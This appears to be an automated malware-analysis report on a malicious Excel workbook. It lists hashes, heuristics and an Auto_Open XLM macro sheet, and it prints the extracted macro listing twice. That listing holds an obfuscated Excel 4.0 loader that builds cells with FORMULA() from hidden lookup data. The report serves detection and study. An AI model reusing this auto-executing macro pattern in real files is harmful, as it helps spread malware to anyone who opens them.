Office (OLE) malware analysis — malicious · 99b340c633db4652

MALICIOUS

Office (OLE)

36.0 KB Created: 2020-11-25 10:45:40 Authoring application: Microsoft Excel First seen: 2021-04-10

MD5: 9a9244986b2cf7576d6749afd142481d SHA-1: 91aa7dc6b95b82ea4a669cb97c2dca5be1389ba4 SHA-256: 99b340c633db4652a1491422dd634420955178194bf2f3d8d2863db2c116e6fd

140 Risk Score

Heuristics 3

Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME

oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN

Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 6550 bytes

Filename	Kind	Source	Size
`xlm_macros.txt`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	6550 bytes
SHA-256: `b0d6bbdd24ccb9e6103f41eace60ba9abf39bdd7daf35eeb66cf0c877c8ff6e8`
Preview script First 1,000 lines of the extracted script ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 16 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - ZuwKohO ' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!C191 ' 0018 27 LABEL : Cell Value, String Constant - ctLIzruTXRuJ len=0 ' 0018 26 LABEL : Cell Value, String Constant - cuBSLqdjyIe len=0 ' 0018 20 LABEL : Cell Value, String Constant - eGizt len=0 ' 0018 26 LABEL : Cell Value, String Constant - eWzIaBLGOAS len=0 ' 0018 25 LABEL : Cell Value, String Constant - fdiddMaDPm len=0 ' 0018 24 LABEL : Cell Value, String Constant - FNmHhgAEc len=0 ' 0018 25 LABEL : Cell Value, String Constant - gMSIQWQvhB len=0 ' 0018 20 LABEL : Cell Value, String Constant - HkXAr len=0 ' 0018 20 LABEL : Cell Value, String Constant - JoFnh len=0 ' 0018 20 LABEL : Cell Value, String Constant - LPxkw len=0 ' 0018 24 LABEL : Cell Value, String Constant - nehtmjHyd len=0 ' 0018 20 LABEL : Cell Value, String Constant - pGBmv len=0 ' 0018 26 LABEL : Cell Value, String Constant - qMwpLihcSRx len=0 ' 0018 22 LABEL : Cell Value, String Constant - qxmjrVR len=0 ' 0018 20 LABEL : Cell Value, String Constant - RgMQj len=0 ' 0018 20 LABEL : Cell Value, String Constant - RHRYn len=0 ' 0018 27 LABEL : Cell Value, String Constant - rtFYIDGBsniW len=0 ' 0018 27 LABEL : Cell Value, String Constant - vSoElSaelRGg len=0 ' 0018 23 LABEL : Cell Value, String Constant - XVXFFOav len=0 ' 0018 25 LABEL : Cell Value, String Constant - ZEGQuAaiRx len=0 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' Sheet,Reference,Formula,Value ' ZuwKohO,C94,"SET.NAME("XVXFFOav",VALUE("0"))","" ' ZuwKohO,C96,"SET.NAME("RHRYn",XVXFFOav)","" ' ZuwKohO,C101,"SET.NAME("FNmHhgAEc",XVXFFOav)","" ' ZuwKohO,C104,"SET.NAME("fdiddMaDPm",COUNTA(qxmjrVR))","" ' ZuwKohO,C109,"SET.NAME("HkXAr",COUNTA(nehtmjHyd))","" ' ZuwKohO,C114,[],"" ' ZuwKohO,C116,"SET.NAME("pGBmv","")","" ' ZuwKohO,C118,"RHRYn","" ' ZuwKohO,C122,"SET.NAME("gMSIQWQvhB",HLOOKUP("",qxmjrVR,RHRYn,FALSE))","" ' ZuwKohO,C125,"cuBSLqdjyIe","" ' ZuwKohO,C130,"SET.NAME("qMwpLihcSRx",XVXFFOav)","" ' ZuwKohO,C134,[],"" ' ZuwKohO,C139,"qMwpLihcSRx","" ' ZuwKohO,C141,"vSoElSaelRGg","" ' ZuwKohO,C145,"rtFYIDGBsniW","" ' ZuwKohO,C147,"ZEGQuAaiRx","" ' ZuwKohO,C152,"SET.NAME("ctLIzruTXRuJ",VALUE(HLOOKUP("",nehtmjHyd,ZEGQuAaiRx,FALSE)))","" ' ZuwKohO,C155,"LPxkw","" ' ZuwKohO,C160,"pGBmv","" ' ZuwKohO,C163,"FNmHhgAEc","" ' ZuwKohO,C167,NEXT(),"" ' ZuwKohO,C169,"eGizt","" ' ZuwKohO,C174,"SET.NAME("f",INT(T(FORMULA(T(pGBmv)&"",""&T(eGizt)))))","" ' ZuwKohO,C179,"eWzIaBLGOAS","" ' ZuwKohO,C182,NEXT(),"" ' ZuwKohO,C187,RETURN(),"" ' ZuwKohO,C217,"SET.NAME("JoFnh",C94)","" ' ZuwKohO,C220,"qxmjrVR","" ' ZuwKohO,C224,"SET.NAME("nehtmjHyd",R92C15)","" ' ZuwKohO,C226,"SET.NAME("eWzIaBLGOAS",234)","" ' ZuwKohO,C231,"SET.NAME("RgMQj",3)","" ' ZuwKohO,C233,JoFnh(),"" ' ZuwKohO,C234,HALT(),""

SHA-256: b0d6bbdd24ccb9e6103f41eace60ba9abf39bdd7daf35eeb66cf0c877c8ff6e8

Preview script

First 1,000 lines of the extracted script

' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     16 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  ZuwKohO
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!C191 
' 0018     27 LABEL : Cell Value, String Constant - ctLIzruTXRuJ len=0 
' 0018     26 LABEL : Cell Value, String Constant - cuBSLqdjyIe len=0 
' 0018     20 LABEL : Cell Value, String Constant - eGizt len=0 
' 0018     26 LABEL : Cell Value, String Constant - eWzIaBLGOAS len=0 
' 0018     25 LABEL : Cell Value, String Constant - fdiddMaDPm len=0 
' 0018     24 LABEL : Cell Value, String Constant - FNmHhgAEc len=0 
' 0018     25 LABEL : Cell Value, String Constant - gMSIQWQvhB len=0 
' 0018     20 LABEL : Cell Value, String Constant - HkXAr len=0 
' 0018     20 LABEL : Cell Value, String Constant - JoFnh len=0 
' 0018     20 LABEL : Cell Value, String Constant - LPxkw len=0 
' 0018     24 LABEL : Cell Value, String Constant - nehtmjHyd len=0 
' 0018     20 LABEL : Cell Value, String Constant - pGBmv len=0 
' 0018     26 LABEL : Cell Value, String Constant - qMwpLihcSRx len=0 
' 0018     22 LABEL : Cell Value, String Constant - qxmjrVR len=0 
' 0018     20 LABEL : Cell Value, String Constant - RgMQj len=0 
' 0018     20 LABEL : Cell Value, String Constant - RHRYn len=0 
' 0018     27 LABEL : Cell Value, String Constant - rtFYIDGBsniW len=0 
' 0018     27 LABEL : Cell Value, String Constant - vSoElSaelRGg len=0 
' 0018     23 LABEL : Cell Value, String Constant - XVXFFOav len=0 
' 0018     25 LABEL : Cell Value, String Constant - ZEGQuAaiRx len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  ZuwKohO,C94,"SET.NAME("XVXFFOav",VALUE("0"))",""
'  ZuwKohO,C96,"SET.NAME("RHRYn",XVXFFOav)",""
'  ZuwKohO,C101,"SET.NAME("FNmHhgAEc",XVXFFOav)",""
'  ZuwKohO,C104,"SET.NAME("fdiddMaDPm",COUNTA(qxmjrVR))",""
'  ZuwKohO,C109,"SET.NAME("HkXAr",COUNTA(nehtmjHyd))",""
'  ZuwKohO,C114,[],""
'  ZuwKohO,C116,"SET.NAME("pGBmv","")",""
'  ZuwKohO,C118,"RHRYn",""
'  ZuwKohO,C122,"SET.NAME("gMSIQWQvhB",HLOOKUP("*",qxmjrVR,RHRYn,FALSE))",""
'  ZuwKohO,C125,"cuBSLqdjyIe",""
'  ZuwKohO,C130,"SET.NAME("qMwpLihcSRx",XVXFFOav)",""
'  ZuwKohO,C134,[],""
'  ZuwKohO,C139,"qMwpLihcSRx",""
'  ZuwKohO,C141,"vSoElSaelRGg",""
'  ZuwKohO,C145,"rtFYIDGBsniW",""
'  ZuwKohO,C147,"ZEGQuAaiRx",""
'  ZuwKohO,C152,"SET.NAME("ctLIzruTXRuJ",VALUE(HLOOKUP("*",nehtmjHyd,ZEGQuAaiRx,FALSE)))",""
'  ZuwKohO,C155,"LPxkw",""
'  ZuwKohO,C160,"pGBmv",""
'  ZuwKohO,C163,"FNmHhgAEc",""
'  ZuwKohO,C167,NEXT(),""
'  ZuwKohO,C169,"eGizt",""
'  ZuwKohO,C174,"SET.NAME("f",INT(T(FORMULA(T(pGBmv)&"",""&T(eGizt)))))",""
'  ZuwKohO,C179,"eWzIaBLGOAS",""
'  ZuwKohO,C182,NEXT(),""
'  ZuwKohO,C187,RETURN(),""
'  ZuwKohO,C217,"SET.NAME("JoFnh",C94)",""
'  ZuwKohO,C220,"qxmjrVR",""
'  ZuwKohO,C224,"SET.NAME("nehtmjHyd",R92C15)",""
'  ZuwKohO,C226,"SET.NAME("eWzIaBLGOAS",234)",""
'  ZuwKohO,C231,"SET.NAME("RgMQj",3)",""
'  ZuwKohO,C233,JoFnh(),""
'  ZuwKohO,C234,HALT(),""

Open this report in the interactive analyzer, or submit your own file for analysis.